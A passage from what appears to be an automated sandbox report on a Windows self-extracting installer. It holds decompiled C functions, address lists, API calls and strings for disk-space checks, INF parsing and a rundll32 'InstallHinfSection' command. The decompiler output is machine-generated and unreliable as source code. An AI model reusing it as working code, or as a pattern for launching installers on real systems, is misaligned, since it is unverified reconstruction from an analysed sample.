                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t140 = 0x525;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t60 =  &_v268;
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t140 = "[";
                                                                                                                                                                                                    								_v1556 = _t151;
                                                                                                                                                                                                    								_t90 = E00171A84( &_v1556, "[");
                                                                                                                                                                                                    								if(_t90 != 0) {
                                                                                                                                                                                                    									if( *_t90 != 0) {
                                                                                                                                                                                                    										_v1556 = _t90;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "]";
                                                                                                                                                                                                    									E00171A84( &_v1556, "]");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									L43:
                                                                                                                                                                                                    									_t60 = 0;
                                                                                                                                                                                                    									_t140 = 0x4b5;
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									_push(0x10);
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									L35:
                                                                                                                                                                                                    									_push(_t60);
                                                                                                                                                                                                    									E001744B9(0, _t140);
                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                    									goto L54;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t155 = _v1556;
                                                                                                                                                                                                    									_t92 = _t155;
                                                                                                                                                                                                    									if( *_t155 == 0) {
                                                                                                                                                                                                    										_t92 = "DefaultInstall";
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									 *0x179120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                    									 *_v1560 = 1;
                                                                                                                                                                                                    									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x171140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                    										 *0x179a34 =  *0x179a34 & 0xfffffffb;
                                                                                                                                                                                                    										if( *0x179a40 != 0) {
                                                                                                                                                                                                    											_t108 = "setupapi.dll";
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t108 = "setupx.dll";
                                                                                                                                                                                                    											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_push( &_v268);
                                                                                                                                                                                                    										_push(_t155);
                                                                                                                                                                                                    										E0017171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										 *0x179a34 =  *0x179a34 | 0x00000004;
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										E00171680(_t108, 0x104, _t155);
                                                                                                                                                                                                    										_t140 = 0x200;
                                                                                                                                                                                                    										E00171680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L53:
                                                                                                                                                                                                    									_t62 = 1;
                                                                                                                                                                                                    									 *_v1564 = _t156;
                                                                                                                                                                                                    									L54:
                                                                                                                                                                                                    									_pop(_t152);
                                                                                                                                                                                                    									return E00176CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}














































                                                                                                                                                                                                    0x00171af3
                                                                                                                                                                                                    0x00171afa
                                                                                                                                                                                                    0x00171b07
                                                                                                                                                                                                    0x00171b09
                                                                                                                                                                                                    0x00171b1a
                                                                                                                                                                                                    0x00171b20
                                                                                                                                                                                                    0x00171b2c
                                                                                                                                                                                                    0x00171b3b
                                                                                                                                                                                                    0x00171b40
                                                                                                                                                                                                    0x00171b2e
                                                                                                                                                                                                    0x00171b2e
                                                                                                                                                                                                    0x00171b33
                                                                                                                                                                                                    0x00171b33
                                                                                                                                                                                                    0x00171b46
                                                                                                                                                                                                    0x00171b4c
                                                                                                                                                                                                    0x00171b52
                                                                                                                                                                                                    0x00171b57
                                                                                                                                                                                                    0x00171b5d
                                                                                                                                                                                                    0x00171b61
                                                                                                                                                                                                    0x00171b9f
                                                                                                                                                                                                    0x00171b9f
                                                                                                                                                                                                    0x00171bb1
                                                                                                                                                                                                    0x00171bc2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171b63
                                                                                                                                                                                                    0x00171b63
                                                                                                                                                                                                    0x00171b65
                                                                                                                                                                                                    0x00171b68
                                                                                                                                                                                                    0x00171b68
                                                                                                                                                                                                    0x00171b6a
                                                                                                                                                                                                    0x00171b6b
                                                                                                                                                                                                    0x00171b6f
                                                                                                                                                                                                    0x00171b74
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171b76
                                                                                                                                                                                                    0x00171b7b
                                                                                                                                                                                                    0x00171b86
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171b8c
                                                                                                                                                                                                    0x00171b8c
                                                                                                                                                                                                    0x00171b98
                                                                                                                                                                                                    0x00171bc7
                                                                                                                                                                                                    0x00171bc9
                                                                                                                                                                                                    0x00171bcc
                                                                                                                                                                                                    0x00171bd3
                                                                                                                                                                                                    0x00171d75
                                                                                                                                                                                                    0x00171d76
                                                                                                                                                                                                    0x00171d78
                                                                                                                                                                                                    0x00171d7f
                                                                                                                                                                                                    0x00171e05
                                                                                                                                                                                                    0x00171e09
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171e12
                                                                                                                                                                                                    0x00171e1b
                                                                                                                                                                                                    0x00171e73
                                                                                                                                                                                                    0x00171e21
                                                                                                                                                                                                    0x00171e21
                                                                                                                                                                                                    0x00171e28
                                                                                                                                                                                                    0x00171e37
                                                                                                                                                                                                    0x00171e3e
                                                                                                                                                                                                    0x00171e52
                                                                                                                                                                                                    0x00171e60
                                                                                                                                                                                                    0x00171e60
                                                                                                                                                                                                    0x00171e3e
                                                                                                                                                                                                    0x00171e79
                                                                                                                                                                                                    0x00171e7b
                                                                                                                                                                                                    0x00171e84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171d9b
                                                                                                                                                                                                    0x00171d9b
                                                                                                                                                                                                    0x00171da0
                                                                                                                                                                                                    0x00171da2
                                                                                                                                                                                                    0x00171da5
                                                                                                                                                                                                    0x00171da5
                                                                                                                                                                                                    0x00171da7
                                                                                                                                                                                                    0x00171da8
                                                                                                                                                                                                    0x00171dac
                                                                                                                                                                                                    0x00171dae
                                                                                                                                                                                                    0x00171db4
                                                                                                                                                                                                    0x00171db7
                                                                                                                                                                                                    0x00171db7
                                                                                                                                                                                                    0x00171db9
                                                                                                                                                                                                    0x00171dba
                                                                                                                                                                                                    0x00171dbe
                                                                                                                                                                                                    0x00171dc3
                                                                                                                                                                                                    0x00171dce
                                                                                                                                                                                                    0x00171dd2
                                                                                                                                                                                                    0x00171deb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171df0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171dd2
                                                                                                                                                                                                    0x00171bf7
                                                                                                                                                                                                    0x00171bfe
                                                                                                                                                                                                    0x00171c07
                                                                                                                                                                                                    0x00171d55
                                                                                                                                                                                                    0x00171d5a
                                                                                                                                                                                                    0x00171d5b
                                                                                                                                                                                                    0x00171d5d
                                                                                                                                                                                                    0x00171d5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171c1b
                                                                                                                                                                                                    0x00171c1b
                                                                                                                                                                                                    0x00171c20
                                                                                                                                                                                                    0x00171c2c
                                                                                                                                                                                                    0x00171c33
                                                                                                                                                                                                    0x00171c38
                                                                                                                                                                                                    0x00171c3a
                                                                                                                                                                                                    0x00171c3a
                                                                                                                                                                                                    0x00171c40
                                                                                                                                                                                                    0x00171c4b
                                                                                                                                                                                                    0x00171c4b
                                                                                                                                                                                                    0x00171c5d
                                                                                                                                                                                                    0x00171c61
                                                                                                                                                                                                    0x00171dd4
                                                                                                                                                                                                    0x00171dd4
                                                                                                                                                                                                    0x00171dd6
                                                                                                                                                                                                    0x00171ddb
                                                                                                                                                                                                    0x00171ddc
                                                                                                                                                                                                    0x00171dde
                                                                                                                                                                                                    0x00171d64
                                                                                                                                                                                                    0x00171d64
                                                                                                                                                                                                    0x00171d67
                                                                                                                                                                                                    0x00171d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171c67
                                                                                                                                                                                                    0x00171c67
                                                                                                                                                                                                    0x00171c6d
                                                                                                                                                                                                    0x00171c72
                                                                                                                                                                                                    0x00171c74
                                                                                                                                                                                                    0x00171c74
                                                                                                                                                                                                    0x00171c8e
                                                                                                                                                                                                    0x00171c99
                                                                                                                                                                                                    0x00171cc0
                                                                                                                                                                                                    0x00171cf8
                                                                                                                                                                                                    0x00171d07
                                                                                                                                                                                                    0x00171d23
                                                                                                                                                                                                    0x00171d09
                                                                                                                                                                                                    0x00171d14
                                                                                                                                                                                                    0x00171d1b
                                                                                                                                                                                                    0x00171d1b
                                                                                                                                                                                                    0x00171d2b
                                                                                                                                                                                                    0x00171d2d
                                                                                                                                                                                                    0x00171d2d
                                                                                                                                                                                                    0x00171d38
                                                                                                                                                                                                    0x00171d39
                                                                                                                                                                                                    0x00171d46
                                                                                                                                                                                                    0x00171cc2
                                                                                                                                                                                                    0x00171cc2
                                                                                                                                                                                                    0x00171ccc
                                                                                                                                                                                                    0x00171cce
                                                                                                                                                                                                    0x00171cce
                                                                                                                                                                                                    0x00171cdb
                                                                                                                                                                                                    0x00171ce6
                                                                                                                                                                                                    0x00171cee
                                                                                                                                                                                                    0x00171cee
                                                                                                                                                                                                    0x00171e89
                                                                                                                                                                                                    0x00171e91
                                                                                                                                                                                                    0x00171e92
                                                                                                                                                                                                    0x00171e94
                                                                                                                                                                                                    0x00171e97
                                                                                                                                                                                                    0x00171ea4
                                                                                                                                                                                                    0x00171ea4
                                                                                                                                                                                                    0x00171c61
                                                                                                                                                                                                    0x00171c07
                                                                                                                                                                                                    0x00171bd3
                                                                                                                                                                                                    0x00171b7b

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00171BE7
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00171BFE
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00171C57
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00171C88
                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00171140,00000000,00000008,?), ref: 00171CB8
                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00171D1B
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                    • API String ID: 383838535-3368923722
                                                                                                                                                                                                    • Opcode ID: e033e72d7ed25f9532cdd00a6aa75a67ba4c1ae6b41aca50937f1ac8d912b471
                                                                                                                                                                                                    • Instruction ID: 6be101b0f330fa53b04e25db4a189476ce2094780318694d7db7bf901e3040cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e033e72d7ed25f9532cdd00a6aa75a67ba4c1ae6b41aca50937f1ac8d912b471
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96A13870A402147BEB309B2CCC49BEA7779AB95310F54C2A5F95DA72C0DBB09EC5CB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 324 17597d-1759b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1759dd-175a1b GetDiskFreeSpaceA 324->325 326 1759bb-1759d8 call 1744b9 call 176285 324->326 327 175ba1-175bde memset call 176285 GetLastError FormatMessageA 325->327 328 175a21-175a4a MulDiv 325->328 345 175c05-175c14 call 176ce0 326->345 337 175be3-175bfc call 1744b9 SetCurrentDirectoryA 327->337 328->327 331 175a50-175a6c GetVolumeInformationA 328->331 334 175ab5-175aca SetCurrentDirectoryA 331->334 335 175a6e-175ab0 memset call 176285 GetLastError FormatMessageA 331->335 339 175acc-175ad1 334->339 335->337 351 175c02 337->351 343 175ad3-175ad8 339->343 344 175ae2-175ae4 339->344 343->344 347 175ada-175ae0 343->347 349 175ae7-175af8 344->349 350 175ae6 344->350 347->339 347->344 353 175af9-175afb 349->353 350->349 354 175c04 351->354 355 175b05-175b08 353->355 356 175afd-175b03 353->356 354->345 357 175b20-175b27 355->357 358 175b0a-175b1b call 1744b9 355->358 356->353 356->355 360 175b52-175b5b 357->360 361 175b29-175b33 357->361 358->351 364 175b62-175b6d 360->364 361->360 363 175b35-175b50 361->363 363->364 365 175b76-175b7d 364->365 366 175b6f-175b74 364->366 368 175b83 365->368 369 175b7f-175b81 365->369 367 175b85 366->367 370 175b87-175b94 call 17268b 367->370 371 175b96-175b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                    			E0017597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v788;
                                                                                                                                                                                                    				long _v792;
                                                                                                                                                                                                    				long _v796;
                                                                                                                                                                                                    				long _v800;
                                                                                                                                                                                                    				signed int _v804;
                                                                                                                                                                                                    				long _v808;
                                                                                                                                                                                                    				int _v812;
                                                                                                                                                                                                    				long _v816;
                                                                                                                                                                                                    				long _v820;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                                    				signed short _t78;
                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				int _t102;
                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                    				unsigned int _t105;
                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                    				long _t112;
                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				signed int _t119;
                                                                                                                                                                                                    				signed int _t120;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t114 = __edi;
                                                                                                                                                                                                    				_t46 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                    				_v804 = __edx;
                                                                                                                                                                                                    				_t118 = __ecx;
                                                                                                                                                                                                    				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                    				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                    				if(_t50 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					_v796 = 0;
                                                                                                                                                                                                    					_v792 = 0;
                                                                                                                                                                                                    					_v800 = 0;
                                                                                                                                                                                                    					_v808 = 0;
                                                                                                                                                                                                    					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                    					__eflags = _t55;
                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                    						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    						 *0x179124 = E00176285();
                                                                                                                                                                                                    						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    						_t110 = 0x4b0;
                                                                                                                                                                                                    						L30:
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						E001744B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                    						_t66 = 0;
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						L32:
                                                                                                                                                                                                    						_pop(_t114);
                                                                                                                                                                                                    						goto L33;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t69 = _v792 * _v796;
                                                                                                                                                                                                    					_v812 = _t69;
                                                                                                                                                                                                    					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                    					__eflags = _t116;
                                                                                                                                                                                                    					if(_t116 == 0) {
                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                    					__eflags = _t73;
                                                                                                                                                                                                    					if(_t73 != 0) {
                                                                                                                                                                                                    						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                    						_t101 =  &_v16;
                                                                                                                                                                                                    						_t111 = 6;
                                                                                                                                                                                                    						_t119 = _t118 - _t101;
                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                    							__eflags = _t22;
                                                                                                                                                                                                    							if(_t22 == 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                    							__eflags = _t87;
                                                                                                                                                                                                    							if(_t87 == 0) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *_t101 = _t87;
                                                                                                                                                                                                    							_t101 = _t101 + 1;
                                                                                                                                                                                                    							_t111 = _t111 - 1;
                                                                                                                                                                                                    							__eflags = _t111;
                                                                                                                                                                                                    							if(_t111 != 0) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t111;
                                                                                                                                                                                                    						if(_t111 == 0) {
                                                                                                                                                                                                    							_t101 = _t101 - 1;
                                                                                                                                                                                                    							__eflags = _t101;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t101 = 0;
                                                                                                                                                                                                    						_t112 = 0x200;
                                                                                                                                                                                                    						_t102 = _v812;
                                                                                                                                                                                                    						_t78 = 0;
                                                                                                                                                                                                    						_t118 = 8;
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							__eflags = _t102 - _t112;
                                                                                                                                                                                                    							if(_t102 == _t112) {
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t112 = _t112 + _t112;
                                                                                                                                                                                                    							_t78 = _t78 + 1;
                                                                                                                                                                                                    							__eflags = _t78 - _t118;
                                                                                                                                                                                                    							if(_t78 < _t118) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t78 - _t118;
                                                                                                                                                                                                    						if(_t78 != _t118) {
                                                                                                                                                                                                    							__eflags =  *0x179a34 & 0x00000008;
                                                                                                                                                                                                    							if(( *0x179a34 & 0x00000008) == 0) {
                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                    								_t103 =  *0x179a38; // 0x0
                                                                                                                                                                                                    								_t110 =  *((intOrPtr*)(0x1789e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                    								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                    								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                    									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                    									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                    										__eflags = _t103 - _t116;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags = _t110 - _t116;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                    									 *0x179124 = 0;
                                                                                                                                                                                                    									_t66 = 1;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t66 = E0017268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                    							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t105 =  *0x179a38; // 0x0
                                                                                                                                                                                                    							_t110 =  *((intOrPtr*)(0x1789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1789e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                    							_t103 = (_t105 >> 2) +  *0x179a38;
                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t110 = 0x4c5;
                                                                                                                                                                                                    						E001744B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						goto L31;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                    					 *0x179124 = E00176285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                    					_t110 = 0x4f9;
                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t110 = 0x4bc;
                                                                                                                                                                                                    					E001744B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0x179124 = E00176285();
                                                                                                                                                                                                    					_t66 = 0;
                                                                                                                                                                                                    					L33:
                                                                                                                                                                                                    					return E00176CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}



































                                                                                                                                                                                                    0x0017597d
                                                                                                                                                                                                    0x00175988
                                                                                                                                                                                                    0x0017598f
                                                                                                                                                                                                    0x0017599a
                                                                                                                                                                                                    0x001759a6
                                                                                                                                                                                                    0x001759a8
                                                                                                                                                                                                    0x001759af
                                                                                                                                                                                                    0x001759b9
                                                                                                                                                                                                    0x001759dd
                                                                                                                                                                                                    0x001759e4
                                                                                                                                                                                                    0x001759f1
                                                                                                                                                                                                    0x001759fe
                                                                                                                                                                                                    0x00175a0b
                                                                                                                                                                                                    0x00175a13
                                                                                                                                                                                                    0x00175a19
                                                                                                                                                                                                    0x00175a1b
                                                                                                                                                                                                    0x00175ba1
                                                                                                                                                                                                    0x00175baf
                                                                                                                                                                                                    0x00175bbd
                                                                                                                                                                                                    0x00175bd8
                                                                                                                                                                                                    0x00175bde
                                                                                                                                                                                                    0x00175be3
                                                                                                                                                                                                    0x00175bec
                                                                                                                                                                                                    0x00175bf0
                                                                                                                                                                                                    0x00175bfc
                                                                                                                                                                                                    0x00175c02
                                                                                                                                                                                                    0x00175c02
                                                                                                                                                                                                    0x00175c02
                                                                                                                                                                                                    0x00175c04
                                                                                                                                                                                                    0x00175c04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175c04
                                                                                                                                                                                                    0x00175a27
                                                                                                                                                                                                    0x00175a3a
                                                                                                                                                                                                    0x00175a46
                                                                                                                                                                                                    0x00175a48
                                                                                                                                                                                                    0x00175a4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175a64
                                                                                                                                                                                                    0x00175a6a
                                                                                                                                                                                                    0x00175a6c
                                                                                                                                                                                                    0x00175abc
                                                                                                                                                                                                    0x00175ac2
                                                                                                                                                                                                    0x00175ac9
                                                                                                                                                                                                    0x00175aca
                                                                                                                                                                                                    0x00175aca
                                                                                                                                                                                                    0x00175acc
                                                                                                                                                                                                    0x00175acc
                                                                                                                                                                                                    0x00175acf
                                                                                                                                                                                                    0x00175ad1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175ad3
                                                                                                                                                                                                    0x00175ad6
                                                                                                                                                                                                    0x00175ad8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175ada
                                                                                                                                                                                                    0x00175adc
                                                                                                                                                                                                    0x00175add
                                                                                                                                                                                                    0x00175add
                                                                                                                                                                                                    0x00175ae0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175ae0
                                                                                                                                                                                                    0x00175ae2
                                                                                                                                                                                                    0x00175ae4
                                                                                                                                                                                                    0x00175ae6
                                                                                                                                                                                                    0x00175ae6
                                                                                                                                                                                                    0x00175ae6
                                                                                                                                                                                                    0x00175ae9
                                                                                                                                                                                                    0x00175aeb
                                                                                                                                                                                                    0x00175af0
                                                                                                                                                                                                    0x00175af6
                                                                                                                                                                                                    0x00175af8
                                                                                                                                                                                                    0x00175af9
                                                                                                                                                                                                    0x00175af9
                                                                                                                                                                                                    0x00175afb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175afd
                                                                                                                                                                                                    0x00175aff
                                                                                                                                                                                                    0x00175b00
                                                                                                                                                                                                    0x00175b03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b03
                                                                                                                                                                                                    0x00175b05
                                                                                                                                                                                                    0x00175b08
                                                                                                                                                                                                    0x00175b20
                                                                                                                                                                                                    0x00175b27
                                                                                                                                                                                                    0x00175b52
                                                                                                                                                                                                    0x00175b52
                                                                                                                                                                                                    0x00175b5b
                                                                                                                                                                                                    0x00175b62
                                                                                                                                                                                                    0x00175b6b
                                                                                                                                                                                                    0x00175b6d
                                                                                                                                                                                                    0x00175b76
                                                                                                                                                                                                    0x00175b7d
                                                                                                                                                                                                    0x00175b83
                                                                                                                                                                                                    0x00175b7f
                                                                                                                                                                                                    0x00175b7f
                                                                                                                                                                                                    0x00175b7f
                                                                                                                                                                                                    0x00175b6f
                                                                                                                                                                                                    0x00175b72
                                                                                                                                                                                                    0x00175b72
                                                                                                                                                                                                    0x00175b85
                                                                                                                                                                                                    0x00175b98
                                                                                                                                                                                                    0x00175b9e
                                                                                                                                                                                                    0x00175b87
                                                                                                                                                                                                    0x00175b8f
                                                                                                                                                                                                    0x00175b8f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b85
                                                                                                                                                                                                    0x00175b29
                                                                                                                                                                                                    0x00175b33
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b35
